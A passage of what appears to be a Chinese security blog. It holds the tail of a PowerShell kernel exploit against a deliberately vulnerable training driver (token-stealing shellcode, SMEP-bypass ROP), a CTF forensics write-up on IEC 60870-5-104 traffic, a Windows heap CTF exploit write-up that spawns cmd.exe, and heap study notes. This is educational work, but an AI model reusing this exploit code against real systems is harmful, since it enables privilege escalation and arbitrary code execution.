    0xBA, 0x04, 0x00, 0x00, 0x00,       # mov edx, 4 (SYSTEM PID)
    0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, # mov eax, [eax + FLINK_OFFSET] <-|
    0x2D, 0xB8, 0x00, 0x00, 0x00,       # sub eax, FLINK_OFFSET           |
    0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, # cmp [eax + PID_OFFSET], edx     |
    0x75, 0xED,                         # jnz                           ->|
    0x8B, 0x90, 0xFC, 0x00, 0x00, 0x00, # mov edx, [eax + TOKEN_OFFSET]
    0x89, 0x91, 0xFC, 0x00, 0x00, 0x00, # mov [ecx + TOKEN_OFFSET], edx
    #---[Recover]
    0x61,                               # popad
    0x33, 0xC0,                         # NTSTATUS -> STATUS_SUCCESS :p
    0x83, 0xc4, 0x1c,                   # add esp, 1ch
    0x5D,                               # pop ebp
    0xC2, 0x08, 0x00                    # ret 8
)

[IntPtr]$Pointer = [EVD2]::VirtualAlloc([System.IntPtr]::Zero, $Shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $Pointer, $Shellcode.Length)
$EIP = [System.BitConverter]::GetBytes($Pointer.ToInt32())
echo "[+] Payload size: $($Shellcode.Length)"
echo "[+] Payload address: $("{0:X8}" -f $Pointer.ToInt32())"
 
$leakAddress = LeakBaseAddress
echo $("Address is {0:x}" -f $leakAddress)
$dwSegBaseAddr = 0x401000
$dwSegOffset = 0x1000
$dwBasePOPEAX = 0x0048BF1D
$dwBaseMOVCR4 = 0x0057DF86
$dwRealMOVCR4 = $dwBaseMOVCR4 - $dwSegBaseAddr + $leakAddress + $dwSegOffset
$dwRealPOPEAX = $dwBasePOPEAX - $dwSegBaseAddr + $leakAddress + $dwSegOffset
$dwCR4 = 0x406e9
echo "[+] pop eax is $($dwRealPOPEAX) `n[+] mov cr4 is $($dwRealMOVCR4)`n"

# finally we write buffer
$Buffer = [Byte[]](0x41)*$dwSize + [System.BitConverter]::GetBytes($dwRealPOPEAX) + [Byte[]](0x41)*8 + [System.BitConverter]::GetBytes($dwCR4) + [System.BitConverter]::GetBytes($dwRealMOVCR4) + $EIP

[EVD2]::DeviceIoControl($hDevice, 0x222003, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero)|Out-null

攻击结果

不知道为啥，提权有时候会失败，不过失败了似乎也没有进入蓝屏的样子…

使用powershell进行攻击的结果如下

DianfengGeek-baby_forenics

2020-09-26T13:11:32.000Z

今天蹭着学弟的队伍，玩了一下CTF，看到了一个有趣的Misc题目，这里记录一下

巅峰极客题解 Baby Forenics

初步分析

题目只给了一个流量包，打开之后里面基本上都看不懂。。。不过发现里面有一个协议的名字很扎眼，叫做IEC 60870-5 104:

这是个啥玩意儿？？？不过misc向来都是学习新的协议的，于是一通搜索，搜出来写奇奇怪怪的文章，不过好像都提到说，这个协议是一个用于电力行业采用的应用通信协议。那只能假设出题人真的再考我们这个的知识点了，于是找了几个文档:
比较宽泛的文档
 讲的比较细致
 这里有格式图

从那篇格式图的博客中，我们能知道，这种协议被称为APDU（Application Protocol Data Unit 应用程序信息单元），结构如下:

可以看到它的魔数为0x68。看到我们的流量包，好像还真的出现过这个数字:

那看来考点没找错，就是考我们这个协议的事情

IEC 60870-5 104 学习笔记

由于是为了做题目，所以是飞快的过了一遍这个协议的内容。

协议种类 ---- I, S, U

大致看了一下，协议分成三种类型的

I类型：编号的信息传输帧（通俗点来说就是主要传数据的）
S类型：编号的监视功能（个人理解就是校验帧一类的）
U类型：控制功能（也就是用于控制是否发送帧之类的）

协议传输与内部计数器

假设有A，B两个站使用这个协议进行通信，双方在通信过程中，内部都会维持三个计数器，分别是

V(S):send，发送端的计数器（也就是自己发出去的帧数），每次发送一个数据包自增1
V®:recive，接收的计数器（也就是自己收到的帧数），每次接受一个数据包自增1
Ack:接收到的数据包中的V®值

用一个实例来说明一下:
假设A向B发送了一个I类型的数据包，那么发送包的当下，因为是第一个发送的包，所有的值都为初始值，所以A中的三个计数器为

V(S)=0
V®=0
ACK=0

所以整个发送过程就类似

1
2
3

A                   B
        I(0,0)
     -------->

其中,I中记录的内容为I(V(S), V®)，具体的格式后面会提到

那假设A又往B发送了一个I类型的数据包，那么当发送的时候，A中的V(S)已经记录过第一次发送的数据了。状态变成了

V(S)=1
V®=0
ACK=0

那么发送过程会变成

1
2
3

A                   B
        I(1,0)
     -------->

假设之后B要回复一个数据包，那么我们来看一下当前B中的数据包的形式:

V(S)=0
V®=2
ACK=0

于是就变成了

1
2
3

A                   B
        I(0,2)
     <--------

再之后，A要回复B一个数据包，此时A中的状态为

V(S)=2
V®=1
ACK=2

那么发送的时候数据包中内容就为:

1
2
3

A                   B
        I(2,1)
     -------->

协议组成

这个协议APDU是由两部分组成的:

APCI = Application Protocol Control Information 应用协议控制信息
ASDU = Application Service Data Unit 应用服务数据单元

APCI

前面这个APCI其实就是相当于一些常见通信协议中的协议头，用来记录一些基本信息的:

如上，我们结合一下我们实际的数据包一起看:

68:开头数据
0e:表示当前ASDU数据包的长度
最低bit用于表示当前数据包为I类型

然后的这个Control Field控制域，会因为数据包种类不同而不同：

I: 这里的4个字节分别表示发送者和接收者
S: 这里的4个字节只有后两个字节在使用，表示接收者
U: 这里只有第一个字节使用，用于表示当前的控制状态

然后回到我们前面的示例中，我们看的是一个I种类的数据包

0400和0200:表示发送者和接收者（小端）。但是根据协议，它们的最低bit是未被使用的，所以其其实表示的是发送者和接收者为2和1，正好就是I(2,1)

我们可以看一下别的数据类型的包:

0100:当前数据包为S类型，并且除了最低的两个bit其余bit并未使用
0400:表示接收者。这里表示的是接收者的计数器为2

43中的低量比特表示当前包类型为U，而高6bit表示当前控制为TESTER act。这个数据包之后需要跟随一个TESTER con的U类型包作为回应，用来确保当前传输的稳定性

ASDU

之后的数据表示的是ASDU，也就是数据信息，我猜测可以将这里理解成，从这里开始表示的是传输的内容：

01:表示当前信息的类型，显示是M_SP_NA_1(1)，也就是遥信单点信息的意思
下一个01:表示的是信息的个数，也即是之后1个
03:表示传输原因，这里的原因是突发传输
00:表示传输发起人的地址，这里就是0
0100:表示通用ASDU的地址，同样是小段，这里是0001的意思
070000:表示当前对象地址，这里是7
01:表示当前传输的品质（不知道为啥是这么个翻译），这里可以看wireshark的解析:

总的来说，就是当前的SPI（状态）属于合（？）
反正总的来说，这个状态表示的是1，那么可以猜测如果没有信息传输的话，默认的信息应该为0

题解

大致学习了一下整个协议，发现这个协议本质上是一个信息传输协议。我猜测这个协议应该是用来传输一些非常底层的数据的，所以很可能每次tcp都只会传输一个bit的信息，而选择对象的下表，应该就是当前对象的地址。那么我们就只需要将这个传输过程中提到的对象地址取出来，将其设为1，其余比特设为0，那就能得到整个传输的数据了!

content = ['0']*100
content[2] = '1'
content[3] = '1'
content[6] = '1'
content[7] = '1'
content[0xA] = '1'
content[0xb] = '1'
content[0xd] = '1'
content[0xe] = '1'
content[0x13] = '1'
content[0x14] = '1'
content[0x16] = '1'
content[0x1a] = '1'
content[0x1b] = '1'
content[0x1f] = '1'
content[0x20] = '1'
content[0x1e] = '1'
content[0x28] = '1'
content[0x26] = '1'
content[0x27] = '1'
content[0x25] = '1'
content[0x22] = '1'
content[0x24] = '1'
content[0x2a] = '1'
content[0x2f] = '1'
content[0x2e] = '1'
content[0x32] = '1'
content[0x36] = '1'
content[0x35] = '1'
content[0x40] = '1'
content[0x3a] = '1'
content[0x42] = '1'
content[0x46] = '1'
content[0x48] = '1'
content[0x47] = '1'
print(content)

def getrevnum(bits):
    re  =''.join(reversed(bits))
    return int(re, 2)

def getnum(bits):
    return int(bits, 2)

for i in range(1,len(content), 8):
    if i + 8 > len(content):
        continue
    each_content = ''.join(content[i:i+8])
    print(chr(getnum(each_content)),end='')

后记

这次比赛除了这个题目其实还有一些比较标准的CTF题，有空的话再整理到博客上吧。

SCTF-EasyWinPwn

2020-07-15T17:30:48.000Z

上上周末打了个比赛，wp硬是拖到了这周才写完。。。。

这个题目牵扯到Windows下的堆的基本运行状态，不熟悉的可以先看上篇介绍Windows heap的文章熟悉一下~

程序分析

某种意义上来说是传统的不能再传统的堆利用，不过是Windows平台下的。首先看到有四个基本功能:

 hHeap = HeapCreate(1u, 0x2000u, 0x2000u);
 puts_ptr = (void (__cdecl *)(const char *))puts;
 MyHeapEntry_0 = (MyHeapEntry *)HeapAlloc(hHeap, 9u, 0x80u);
while ( 1 )
 {
   puts_ptr("/----------------------\\");
   puts_ptr("|   1: Alloc.          |");
   puts_ptr("|   2: Delete.         |");
   puts_ptr("|   3: Show.           |");
   puts_ptr("|   4: Edit.           |");
   puts_ptr("|   5: Exit.           |");
   puts_ptr("\\----------------------/");
   puts_ptr("option >");

常见的全局堆对象，和常见分配删除显示修改。首先我们看到一个用来存放我们分配内存的结构体:

struct MyHeapEntry{
    void* puts_ptr;//最低4字节用来存放当前分配的大小
    void* content;
}
MyHeapEntry hHeap[16];

这里居然存放了一个函数指针，基本上就是一个巨大的伏笔，之后肯定是需要将这个地方的函数指针给修改了的。

分配相关的逻辑:

puts_ptr("size >");
scanf_("%ud", &v19);
getchar();
if ( v19 > 0x90 )
  break;
v6 = (v19 >> 4) + 1;
v7 = HeapAlloc(hHeap, 1u, v6);
v8 = MyHeapEntry_0;
MyHeapEntry_0[offset].func_ptr = (unsigned int)puts | v6;
v8[offset].content = (int)v7;

这里跳过部分堆块检测。这里首先会将我们输入的大小size>>4，然后放在我们之前提到的MyHeapEntry.puts_ptr的最低字节处。猜测这边是为了减小堆所占有的空间，所以只放了四个字节。但是！这里粗心的申请了右移后的大小，也就是说实际上content的大小会远远小于我们申请的大小。

删除相关的逻辑:

puts_ptr("index >");
scanf_("%ud", &i);
getchar();
if ( i >= 0x10 || !MyHeapEntry_0[i].content )
    goto LABEL_29;
HeapFree(hHeap, 1u, (LPVOID)MyHeapEntry_0[i].content);
continue;

经典UAF，删除之后啥都不做，基本上leak的点就找到了。先delete这个chunk，然后直接打印即可泄露。

打印相关的逻辑:

puts_ptr("index >");
scanf_("%ud", &index_);
getchar();
if ( index_ >= 0x10 || !MyHeapEntry_0[index_].content )
    goto LABEL_29;
((void (__cdecl *)(int))(MyHeapEntry_0[index_].func_ptr & 0xFFFFFFF0))(MyHeapEntry_0[index_].content);
continue;

没有check，直接call之前存放在堆上的函数指针，而且正好还会传一个参数进去。。。。看起来只要能够有一个任意地址修改就能够做到利用了

修改相关的逻辑:

puts_ptr("index >");
scanf_("%ud", &index);
getchar();
if ( index >= 0x10 )
    goto LABEL_29;
j = index;
if ( !MyHeapEntry_0[index].content )
    goto LABEL_29;
puts_ptr("content  >");
k = 0;
func = MyHeapEntry_0[j].func_ptr;
cont = MyHeapEntry_0[j].content;
real_size = 16 * (func & 0xF);
chr = getchar();
if ( chr != 10 )
{
    do
    {
    *(_BYTE *)(k++ + cont) = chr;
    if ( k == real_size - 1 )
        break;
    chr = getchar();
    }
    while ( chr != 10 );
    puts_ptr = (void (__cdecl *)(const char *))puts;
}
*(_BYTE *)(k + cont) = 0;
continue;

这里就能发现之前申请内存的那个问题暴露。首先可以注意到，size的大小正如之前猜测的那样，是存放在最低字节的数字*16，而我们申请的内存大小仅仅为最低字节的数字那么小，所以这边肯定会发生堆溢出。

利用思路

经典的题目，经典的思路。pwn题两大思路：

leak
pwn!

Leak 数据

这边为了方便描述，我们将MyHeapEntry_0中存放的每一个元素称为block

Leak 堆相关地址

首先简单科普一哈，Windows下的ASLR和Linux有点点不一样。Windows的ASLR是当image被加载到进程中的时候，整个Image都是ASLR的，包含代码段。而Linux还要开启PIE才会让代码段也随机化。

如何查看ASLR

在Windows下可以使用指令:

1	dumpbin /headers EasyWinHeap.exe

检查当前exe开启了哪些保护。这个dumpbin是VS提供的一个tool，基本上装了vs的都会附带这个exe，使用vs的那个Native Tools Command Prompt的话即可直接敲指令使用了。找打这个exe的Optional header values

OPTIONAL HEADER VALUES
             10B magic # (PE32)
           14.26 linker version
            1000 size of code
            1600 size of initialized data
               0 size of uninitialized data
            1584 entry point (00401584)
            1000 base of code
            2000 base of data
          400000 image base (00400000 to 00405FFF)
            1000 section alignment
             200 file alignment
            6.00 operating system version
            0.00 image version
            6.00 subsystem version
               0 Win32 version
            6000 size of image
             400 size of headers
               0 checksum
               3 subsystem (Windows CUI)
            8140 DLL characteristics
                   Dynamic base   <------
                   NX compatible
                   Terminal Server Aware

箭头指向的地方即表示打开了ASLR。

本来很容易能看出UAF+堆溢出=unlink，但是我们却找不到MyHeapEntry_0这个变量的地址，只好先尝试leak。好在UAF之后没有任何check就能够打印，因此可以将堆的地址leak出来。然后，一个非常重要的特点（比赛的时候居然没发现！），这里的MyHeapEntry_0的值也是在堆上的！所以换句话说，其实这里不需要知道MyHeapEntry_0这个变量的具体地址，而是这个数组指向的地址，也就是一个堆上的地址。我们稍微分析一下堆此时的情况可以有如下的图:

+-------------+-------------+            +-------------+-------------+
| func_ptr    |   func_ptr  |            |             |             |
+-------------+-------------+   .......  |   content   |   content   |
| content_ptr | content_ptr |            |             |             |
+-------------+-------------+            +-------------+-------------+
     |             |                           ^              ^
     |             |                           |              |
     |             |                           |              |
     |             +---------------------------|--------------+
     +-----------------------------------------+

此时的内存中每一个内存块的相对偏移都是一样的。也就是说，我们只要能够泄露一块地址，我们此时就能够利用相对偏移的方式，找到当前存放的func_ptr/content_ptr的block。这边稍微写一个poc试一下:

def pwn():
    ph = Process("EasyWinHeap.exe")
    # ph.interactive()
    # 0
    alloca(ph, 2)
    # 1
    alloca(ph, 2)
    # 2
    alloca(ph, 2)
    # 3
    alloca(ph, 2)
    # 4
    alloca(ph, 2)
    # 5
    alloca(ph, 2)
    # delete the 1 and 3 
    delete(ph, 1)
    delete(ph, 3)
    # print the index 3, leak information
    cont = show(ph, 1)
    print(cont)
    addr = u32(cont[6:6+4])
    print("[*] leak address is " + hex(addr))

上述代码构造了一个如下的堆:

通过打印，我们就能够将bk的内容打印出来。并且如上图，这些内存的相对位置都是固定的，于是我们就能将当前的MyHeapEntry数组的地址泄露出来。

# table base address
table_addr = addr - 0xc0+0x8
print("[+] table address is " + hex(table_addr))
# now we try to unlink this chunk
block_1 = table_addr + 0xc

Leak image

当获得了block[1]的地址之后，我们此时就有了一个unlink的机会。这边记得，Windows下的unlink是不计算heap头的，所以写出来的利用code就是如下的形式:

# unlink this block
fd = block_1-0x4
bk = block_1
"""
                                   block[1]
+----------+----------+----------+-----------+-----------+
|   func   |  ptr[0]  |   func   |   ptr[1]  |   func    |
+----------+----------+----------+-----------+-----------+
"""
send_content = p32(fd)+p32(bk)
print("[*] fd:0x%x, bk:0x%x"%(fd, bk))
print(send_content)
edit(ph, 1, send_content)
# trigger the unlink
delete(ph, 0)

trigger漏洞之后，我们就能够得到:

1	block[1].ptr-> &block[1].ptr

此时我们只要尝试修改block[1]的content，就能够直接修改ptr的值，甚至block[2]/block[3]...的func和ptr，也就是一个任意地址写。同时，当call show的时候，会调用

1	func(ptr[1])

此处相当于是任意地址读。那我们接下来要做的事情就和Linux下的pwn有点像：找到system函数，然后call起来~。回忆一下，Linux下我们会尝试寻找一个函数（通常就是puts）的got表，然后将其plt的值打印出来，再和主办方提供的libc.so.6的puts地址对比找到其加载的地址。而Windows下其实也是一样的，只不过Windows下的叫做导入表IAT (import address table)，比方说这个puts函数:

// .code
.text:00401040 ; int __cdecl puts(const char *Str)
.text:00401040 puts            proc near               ; DATA XREF: sub_401050+174↓o
.text:00401040
.text:00401040 Str             = dword ptr  4
.text:00401040
.text:00401040                 jmp     ds:__imp_puts
.text:00401040 puts            endp
// IAT part
.idata:004020C4 ; int __cdecl puts(const char *Str)
.idata:004020C4                 extrn __imp_puts:dword  ; CODE XREF: sub_401050+95↑p
.idata:004020C4                                         ; sub_401050+9C↑p ...

可以看到，其本身和Linux也很像，也是当call puts函数的时候，直接跳转到一个表上，这个表中会填入puts在当前进程中真正的函数地址。而puts在的dll名字叫做ucrtbase.dll，其中正好存放了system这个函数。那利用起来就和Linux很像了。不过由于ASLR对整个image都生效了，首先我们要试着泄露image。幸好puts的地址被存放在了堆上，而且之前我们让block[1]指向了ptr, 我们这边将image的地址泄露出来:

# now the block[1] point to &block[1]
cont = show(ph, 1)
print(cont)
addr = cont[6:]
addr = u32(addr)&0xfffffff0
print("func|size is " + hex(addr))
input("waiting for dbg...")
puts_real = addr
puts_func_offset = 0x00401040 - 0x00401000
puts_iat = 0x004020c4 - 0x00401000
base_image = puts_real - puts_func_offset
print("[+] leak image base is " + hex(base_image))

泄露出了此时内存中image的puts的地址，然后通过当前image的相对偏移量，就能够将整个image的地址泄露出来。
之后我们计算出此时puts在IAT中的地址，然后写入block[1].ptr，之后再次泄露:

send_content = p32(puts_iat+base_image)
edit(ph, 1, send_content)
cont = show(ph, 1)
print(cont)
# here we leak the ucrtbase address
puts_curt_addr = u32(cont[2:5])
print("[+] now leak the ucrt_base address ")

此时我们就能够将ucrtbase.dll给泄露出来了！

PWN！

现在完事具备，我们只剩下将函数指针修改一下，然后call show 就能够完成pwn了！不过此时稍微注意一下，我们之前已经将block[1].ptr修改成了puts的IAT地址，此时如果调用edit，只会尝试修改puts IAT地方的内容，这个显然不是我们希望的，毕竟我们需要一个可以控制的指针。不过还记得刚刚提到的，我们的任意地址写能够直接修改ptr的值，甚至block[2]/block[3]...的func和ptr。所以我们只需要在泄露image的那次，提前将block[2]或者block[3]的ptr地址布置成我们想要的形式，就能够继续实现任意地址写！
经过测试，我们发现修改直接修改block[2]的指针，使其指向block[1]-0x4，那么此时即使我们使用完block[1]之后，仍然拥有第二个任意地址写的指针。
这次我们直接将block[1]-0x4的位置开始的值写入cmd.exe\0，然后正好可以把属于block[2]的位置的函数修改成我们的目标函数指针。这边附上代码说明更加简单

"""
                  block[1]              block[1]
    +----------+----------+----------+-----------+-----------+
    |   func   | puts_iat |   func   |   ptr[2]  |   func    |
    +----------+----------+----------+-----------+-----------+
    ptr[2] ---> &block[1]
    """

    send_content = p32(puts_iat+base_image) + p32(puts_real) + p32(block_1 - 0x4)
    edit(ph, 1, send_content)
    cont = show(ph, 1)
    print(cont)
    # here we leak the ucrtbase address
    puts_ucrt_addr = u32(cont[2:6])
    print(hex(puts_ucrt_addr))
    ucrt_base = puts_ucrt_addr - ucrt_puts
    print("[+] now leak the ucrt_base address " + hex(ucrt_base))
    real_system = ucrt_system + ucrt_base
    print("[+] the system address is " + hex(real_system))
    # now we overwrite the block[2] func and content information
    edit(ph, 2, b"cmd.exe\0" + p32(real_system) + p32(block_1 - 0x4))
    input("waiting for dbg...")
    # edit(ph, 1, p32(block_1+4) + )
    print_banner(ph)
    ph.sendline("3")
    print("3")
    cont = ph.recvuntil("index >")
    print(cont.decode('utf-8'))
    ph.sendline(str(2))
    ph.interactive()

运行之后就能够拿到shell啦！

content  >
b'cmd.exe\x00\x90\xc0Ou\xa0\x04y\x01'
waiting for dbg...

/----------------------\
|   1: Alloc.          |
|   2: Delete.         |
|   3: Show.           |
|   4: Edit.           |
|   5: Exit.           |
\----------------------/
option >
3

index >
Switching to interative mode
$
Microsoft Windows [ 10.0.18363.900]
(c) 2019 Microsoft Corporation

后记

这段时间因为工作上的一些事情，过的浑浑噩噩的。甚至于对技术都没能像过去那样充满专注，导致一个简单的heap pwn 的writeup居然也写了两周，这个真的是不应该。不过这个比赛也让我发现CTF确实是第一生产力（大雾），看了两周没看懂的winheap，一个比赛就懂了，确实还是有帮助。而且Windows下的堆和Linux下的区别似乎不少，这次比赛也只是浅浅的了解了一些，以后有机会的话还是得深入理解一下Rtl系列中和heap相关的部分。

WindowsHeap101

2020-07-13T16:24:57.000Z

基本上是照搬AngelBoy大师傅的slides，纯新手用的Windows heap笔记…

Windows Heap 101

windows heap结构

堆的种类

Defautl Heap:默认堆，当使用Windows api直接申请的时候使用的就是这个堆
存放在_PEB中
CRT heap：使用C头分配的堆，本质上还是defaut，不过有自己封装了一层别的内容
存放在crt_heap中

win10之后堆分为两种：Segment heap和NT heap。当一个进程分配堆的时候，大部分场合默认使用的堆都是后面那种，前面的segment heap通常会在winapp或者某些特殊的进程（核心进程）中会使用到。（也可以控制注册表打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\)
这两种堆称为前端堆（Frontend Heap）和后端堆（Backend Heap）

官方文档中对于堆的介绍

最近查看MSDN的时候，发现官方也有了对于堆的介绍了！虽然可能和实际有点出入，不过好歹也是官方的，这里记录一下。

Light page heap block(alloc)

+-----+---------------+---+                                  
|     |               |   |                                  
+-----+---------------+---+                                  
   ^         ^          ^                                    
   |         |          8 suffix bytes (filled with 0xA0)    
   |         User allocation (filled with E0 if zeroing not requested) 
   Block header (starts with 0xABCDAAAA and ends with 0xDCBAAAAA)

Light page heap block(free)

+-----+---------------+---+                                  
|     |               |   |                                  
+-----+---------------+---+                                  
   ^         ^          ^                                    
   |         |          8 suffix bytes (filled with 0xA0)    
   |         User allocation (filled with F0 bytes)          
   Block header (starts with 0xABCDAAA9 and ends with 0xDCBAAA9)

Full page heap block – allocated:

+-----+---------+---+-------                                 
|     |         |   |  ... N/A page                          
+-----+---------+---+-------                                 
   ^       ^      ^                                          
   |       |      0-7 suffix bytes (filled with 0xD0)        
   |       User allocation (if zeroing not requested, filled   
           with C0)       
   Block header (starts with 0xABCDBBBB and ends with 0xDCBABBBB)

Full page heap block – freed:

+-----+---------+---+-------                                 
|     |         |   |  ... N/A page                          
+-----+---------+---+-------                                 
   ^       ^      ^                                          
   |       |      0-7 suffix bytes (filled with 0xD0)        
   |       User allocation (filled with F0 bytes)            
   Block header (starts with 0xABCDBBA and ends with 0xDCBABBBA)

核心结构体

HEAP

管理堆最主要的结构体，在每一个被分配的堆的最前面。（就好像arena一类的结构体）

2:007> dt ntdll!_HEAP
   +0x000 Segment          : _HEAP_SEGMENT
   +0x000 Entry            : _HEAP_ENTRY
   +0x008 SegmentSignature : Uint4B
   +0x00c SegmentFlags     : Uint4B
   +0x010 SegmentListEntry : _LIST_ENTRY
   +0x018 Heap             : Ptr32 _HEAP
   +0x01c BaseAddress      : Ptr32 Void
   +0x020 NumberOfPages    : Uint4B
   +0x024 FirstEntry       : Ptr32 _HEAP_ENTRY
   +0x028 LastValidEntry   : Ptr32 _HEAP_ENTRY
   +0x02c NumberOfUnCommittedPages : Uint4B
   +0x030 NumberOfUnCommittedRanges : Uint4B
   +0x034 SegmentAllocatorBackTraceIndex : Uint2B
   +0x036 Reserved         : Uint2B
   +0x038 UCRSegmentList   : _LIST_ENTRY
   +0x040 Flags            : Uint4B
   +0x044 ForceFlags       : Uint4B
   +0x048 CompatibilityFlags : Uint4B
   +0x04c EncodeFlagMask   : Uint4B
   +0x050 Encoding         : _HEAP_ENTRY
   +0x058 Interceptor      : Uint4B
   +0x05c VirtualMemoryThreshold : Uint4B
   +0x060 Signature        : Uint4B
   +0x064 SegmentReserve   : Uint4B
   +0x068 SegmentCommit    : Uint4B
   +0x06c DeCommitFreeBlockThreshold : Uint4B
   +0x070 DeCommitTotalFreeThreshold : Uint4B
   +0x074 TotalFreeSize    : Uint4B
   +0x078 MaximumAllocationSize : Uint4B
   +0x07c ProcessHeapsListIndex : Uint2B
   +0x07e HeaderValidateLength : Uint2B
   +0x080 HeaderValidateCopy : Ptr32 Void
   +0x084 NextAvailableTagIndex : Uint2B
   +0x086 MaximumTagIndex  : Uint2B
   +0x088 TagEntries       : Ptr32 _HEAP_TAG_ENTRY
   +0x08c UCRList          : _LIST_ENTRY
   +0x094 AlignRound       : Uint4B
   +0x098 AlignMask        : Uint4B
   +0x09c VirtualAllocdBlocks : _LIST_ENTRY
   +0x0a4 SegmentList      : _LIST_ENTRY
   +0x0ac AllocatorBackTraceIndex : Uint2B
   +0x0b0 NonDedicatedListLength : Uint4B
   +0x0b4 BlocksIndex      : Ptr32 Void
   +0x0b8 UCRIndex         : Ptr32 Void
   +0x0bc PseudoTagEntries : Ptr32 _HEAP_PSEUDO_TAG_ENTRY
   +0x0c0 FreeLists        : _LIST_ENTRY
   +0x0c8 LockVariable     : Ptr32 _HEAP_LOCK
   +0x0cc CommitRoutine    : Ptr32     long 
   +0x0d0 StackTraceInitVar : _RTL_RUN_ONCE
   +0x0d4 CommitLimitData  : _RTL_HEAP_MEMORY_LIMIT_DATA
   +0x0e4 FrontEndHeap     : Ptr32 Void
   +0x0e8 FrontHeapLockCount : Uint2B
   +0x0ea FrontEndHeapType : UChar
   +0x0eb RequestedFrontEndHeapType : UChar
   +0x0ec FrontEndHeapUsageData : Ptr32 Wchar
   +0x0f0 FrontEndHeapMaximumIndex : Uint2B
   +0x0f2 FrontEndHeapStatusBitmap : [257] UChar
   +0x1f4 Counters         : _HEAP_COUNTERS
   +0x250 TuningParameters : _HEAP_TUNING_PARAMETERS

这里注我们关注如下的结构体对象

EncodeFlagMask：当在堆被初始化之后，会被设置为0x100000，这个标志位能够决定当前的堆头部是否会被加密
Encoding：这个值用来和chunk header进行亦或，从而得到真实的chunk header
BlocksIndex：这个值用来管理后端堆，其本质为_HEAP_LIST_LOOKUP_
FreeList：用于搜集所有的被释放后的堆块，这个链表和unsorted bin有点像，是一个排列过的链表。其本质为FreeList
FrontEndHeap: 指向前端堆结构体的指针
FrontEndHeapUsageData: 记录不同大小的堆的使用情况，当到达一定水平的时候，堆将会使用前端堆而不是后端堆。

_HEAP_ENTRY

每一个堆的最基本的堆结构体

+-------------------------+
| PreviousBlockPrivateData|
+-------------------------+
|       chunk header      |
+-------------------------+
|          data           |
+-------------------------+

chunk为一个最基本的单位，在win10里面也是。
chunk分为三种不同的堆：

Allocated chunk
Free chunk
VirtualAlloc chunk(没有PreviousBlockPrivateData)

三者的结构体有一点不同，我们先介绍第一种。

2:007> dt ntdll!_HEAP_ENTRY
   +0x000 UnpackedEntry    : _HEAP_UNPACKED_ENTRY
   +0x000 Size             : Uint2B
   +0x002 Flags            : UChar
   +0x003 SmallTagIndex    : UChar
   +0x000 SubSegmentCode   : Uint4B
   +0x004 PreviousSize     : Uint2B
   +0x006 SegmentOffset    : UChar
   +0x006 LFHFlags         : UChar
   +0x007 UnusedBytes      : UChar
   +0x000 ExtendedEntry    : _HEAP_EXTENDED_ENTRY
   +0x000 FunctionIndex    : Uint2B
   +0x002 ContextValue     : Uint2B
   +0x000 InterceptorValue : Uint4B
   +0x004 UnusedBytesLength : Uint2B
   +0x006 EntryOffset      : UChar
   +0x007 ExtendedBlockSignature : UChar
   +0x000 Code1            : Uint4B
   +0x004 Code2            : Uint2B
   +0x006 Code3            : UChar
   +0x007 Code4            : UChar
   +0x004 Code234          : Uint4B
   +0x000 AgregateCode     : Uint8B

这里我们关注如下的结构体：

PreviousBlockPrivateData（8 byte）: 结构体中未显示，是上一个堆块的数据。
Size: 当前堆块的大小（向右移了3个字节）
Flag：当前的堆块是否busy（被使用）
SmallTagIndex: 和开头的三个字节异或，作为checknumber，用于verify当前的chunk
PreviousSize：上一个堆块的大小，这个值同样也是右移了三个字节
UnusedBytes：当分配了当前chunk之后，当前堆还剩余的大小，这个值通常用来检查当前chunk的状态

从偏移量+0x8开始就是userdata

如果是free的堆块的话，则可能还有如下两个字段：

1 2	+0x008 FLink +0x00c Blink

Flink指向下一个在链表中的堆，Blink指向前一个在链表中的堆。此时的UnusedBytes必须要为0

如果是VirualAlloc分配的堆的话，它的结构如下:

2:007> dt ntdll!_HEAP_VIRTUAL_ALLOC_ENTRY
   +0x000 Entry            : _LIST_ENTRY
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY
   +0x008 ExtraStuff       : _HEAP_ENTRY_EXTRA
   +0x010 CommitSize       : Uint4B
   +0x014 ReserveSize      : Uint4B
   +0x018 BusyBlock        : _HEAP_ENTRY

这种heap分配的堆在使用中就会用链表记录分配的堆情况。同时，在这个结构体中记录的size将会是未发生过位移的大小。并且这里的UnusedByte必须要为4

FreeList

当存在被释放的堆块的时候，内存中形式如下:

       HEAP
0x80
+----------------+
|    Encoding    |
+----------------+
     .......                                         +----------------+
0x150                                                | Previous Data  |
+----------------+          Not really chunk         +----------------+
|    FreeList    | ------> +----------------+        |  chunk header  |
+----------------+         |      Flink     |  ----->+----------------+
                           +----------------+        |     Flink      |-----+
                           |      Blink     |        +----------------+     |
                           +----------------+        |     Blink      |     |
                                    ^    |           +----------------+     |
                                    |    |                                  |
                                    |    |           +----------------+     |
                                    |    |           | Previous Data  |     |
                                    |    |           +----------------+     |
                                    |    |           |  chunk header  |     |
                                    |    +---------->+----------------+<----+
                                    |                |     Flink      |-----+
                                    |                +----------------+     |
                                    |                |     Blink      |     |
                                    |                +----------------+     |
                                    +---------------------------------------+


```         
PS:                                                                
_Blink的线会和Flink交错，就不画出来了，方向和上一个chunk的顺序是反过来的_

我们这边用一个简单的代码来说明一下这个过程:
```cpp
HANDLE hHeap = HeapCreate(HEAP_NO_SERIALIZE, 0x2000, 0x2000);
PVOID heap[5];
heap[0] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x80);
heap[1] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x80);
heap[2] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x80);
heap[3] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x80);
for (int i = 0; i < 4; i++) {
    printf("%d: [0x%x]\n", i, heap[i]);
}
// now will free heap
HeapFree(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, heap[0]);
// we don't know if it will merge... just reserve 1
